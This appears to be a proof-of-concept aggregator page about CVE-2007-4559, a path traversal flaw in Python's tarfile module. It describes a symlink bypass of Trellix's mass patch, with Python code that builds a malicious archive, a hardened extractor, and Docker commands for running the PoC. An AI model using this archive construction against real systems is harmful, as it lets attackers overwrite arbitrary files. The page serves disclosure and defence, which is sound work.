Related vulnerability
Title:
Python tarfile module path traversal vulnerability
(CVE-2007-4559)
Description: Python is an open-source, object-oriented programming language maintained by the Python Software Foundation; it is extensible, supports modules and packages, and runs on many platforms. The (1) extract and (2) extractall functions in Python's tarfile module contain a directory traversal vulnerability that allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in filenames inside a TAR archive. The issue is related to CVE-2001-1267.
Description
Bypass for the Trellix patch for CVE-2007-4559
Introduction
# trellix-tarslip-patch-bypass
In 2023, Trellix announced [1] that they had patched more than 61,000 open-source projects for [CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559), an old path traversal vulnerability in Python's tarfile module. Analyzing their patch, it is easy to notice that it only validates each member's textual path against the destination directory before extraction and never resolves symlinks that the archive itself creates, so it can be bypassed using a symlink: the archive first drops a symlink pointing outside the destination, then a regular file whose name goes through that symlink and contains no `..` at all.
Symlink path traversal is an old technique; it is also shown in LiveOverflow's video [Critical .zip vulnerabilities? - Zip Slip and ZipperDown](https://www.youtube.com/watch?v=Ry_yb5Oipq0).
[1] [Trellix Advanced Research Center Patches 61,000 Vulnerable Open-Source Projects](https://www.trellix.com/blogs/research/trellix-advanced-research-center-patches-vulnerable-open-source-projects/)
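The following is an added, self-contained example written for this page; it is not the repository's `poc.py` or `bypass.tar.gz`, and `name_check_extract` / `is_within_directory` are a reconstruction (an assumption, not code taken from the page) of the name-only check style used by the CVE-2007-4559 patch. It builds a constructed archive with a symlink member `link` pointing outside the extraction root and a file member `link/evil.txt`, shows that the name-only check passes and the file lands outside, and then shows a hardened extractor that checks the resolved filesystem path and link targets. It needs a POSIX filesystem with symlink support.

```python
import io
import os
import tarfile
import tempfile

# Constructed archive (not the repository's bypass.tar.gz): a symlink member that
# points outside the extraction root, followed by a regular file whose name goes
# *through* that symlink. Neither member name contains "..".
def build_bypass_tar(outside_dir: str) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("link")
        link.type = tarfile.SYMTYPE
        link.linkname = outside_dir          # a relative target such as ".." works as well
        tar.addfile(link)

        payload = b"owned\n"
        evil = tarfile.TarInfo("link/evil.txt")
        evil.size = len(payload)
        evil.mode = 0o644
        tar.addfile(evil, io.BytesIO(payload))
    return buf.getvalue()

# Pass filter="fully_trusted" where tarfile supports extraction filters (3.12+ and
# the backported security releases) so the legacy behaviour is what gets exercised.
_LEGACY = {"filter": "fully_trusted"} if hasattr(tarfile, "fully_trusted_filter") else {}

# Name-only check in the style of the widely distributed CVE-2007-4559 patch
# (reconstructed as an assumption, not copied from the page). It validates the
# *textual* path of every member and only then extracts everything.
def is_within_directory(directory: str, target: str) -> bool:
    abs_directory = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    # String-prefix comparison; fragile on its own ("/tmp/dest" also prefixes "/tmp/dest2").
    prefix = os.path.commonprefix([abs_directory, abs_target])
    return prefix == abs_directory

def name_check_extract(tar: tarfile.TarFile, path: str) -> None:
    for member in tar.getmembers():
        if not is_within_directory(path, os.path.join(path, member.name)):
            raise tarfile.TarError("Attempted Path Traversal in Tar File")
    # "link" and "link/evil.txt" both look like they stay inside `path`, so the
    # loop never raises. The symlink is created first; the file then follows it.
    tar.extractall(path, **_LEGACY)

# Hardened variant: check every member against the *resolved* filesystem path,
# reject links that escape, and extract one member at a time so that symlinks
# created by earlier members are visible to realpath() for later ones. On
# Python 3.12+ (and backports) extractall(path, filter="data") performs the same checks.
def hardened_extract(tar: tarfile.TarFile, path: str) -> None:
    root = os.path.realpath(path)
    for member in tar.getmembers():
        if os.path.isabs(member.name):
            raise tarfile.TarError(f"absolute member name: {member.name}")
        target = os.path.realpath(os.path.join(root, member.name))
        if os.path.commonpath([root, target]) != root:
            raise tarfile.TarError(f"member escapes destination: {member.name}")
        if member.issym() or member.islnk():
            if os.path.isabs(member.linkname):
                raise tarfile.TarError(f"absolute link target: {member.name}")
            if member.issym():   # symlink targets are relative to the link's own directory
                link_target = os.path.join(root, os.path.dirname(member.name), member.linkname)
            else:                # hard link targets are relative to the archive root
                link_target = os.path.join(root, member.linkname)
            if os.path.commonpath([root, os.path.realpath(link_target)]) != root:
                raise tarfile.TarError(f"link escapes destination: {member.name}")
        tar.extract(member, root, **_LEGACY)

def demo() -> tuple:
    """Returns (bypassed, blocked): whether the name-only check let evil.txt land
    outside the destination, and whether the hardened extractor rejected the archive."""
    with tempfile.TemporaryDirectory() as tmp:
        outside = os.path.join(tmp, "outside")
        os.mkdir(outside)
        data = build_bypass_tar(outside)

        dest1 = os.path.join(tmp, "dest1")
        os.mkdir(dest1)
        with tarfile.open(fileobj=io.BytesIO(data)) as tar:
            name_check_extract(tar, dest1)
        bypassed = os.path.isfile(os.path.join(outside, "evil.txt"))

        dest2 = os.path.join(tmp, "dest2")
        os.mkdir(dest2)
        blocked = False
        try:
            with tarfile.open(fileobj=io.BytesIO(data)) as tar:
                hardened_extract(tar, dest2)
        except tarfile.TarError:
            blocked = True
        return bypassed, blocked

if __name__ == "__main__":
    print(demo())   # (True, True) on a POSIX filesystem with symlink support
```

The point of the hardened version is that the check must happen against what the filesystem will actually do at write time, not against the member name as a string: `realpath()` follows the symlink dropped by the previous member, and link targets are validated before the link is created. Prefer the standard library's `filter="data"` where it is available; the manual loop is what you need on interpreters that predate it.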
### PoC
```
# build the image from the repository's Dockerfile (it ships poc.py and bypass.tar.gz)
docker build -t tarslip .
# open a shell inside the container
docker run -it tarslip bash
# run the proof of concept against the patched extraction code
python poc.py
# if the bypass worked, evil.txt now exists here, outside the extraction target
cat evil.txt
```
File snapshot
[4.0K] /data/pocs/4b06d88876c026fa96dde9348f1cb1211233583b
├── [ 160] bypass.tar.gz
├── [ 51] Dockerfile
├── [1.1K] poc.py
└── [ 803] README.md
0 directories, 4 files
Notes
1. Accessing the original source is recommended.
2. If the source is no longer available or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong (神龙) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.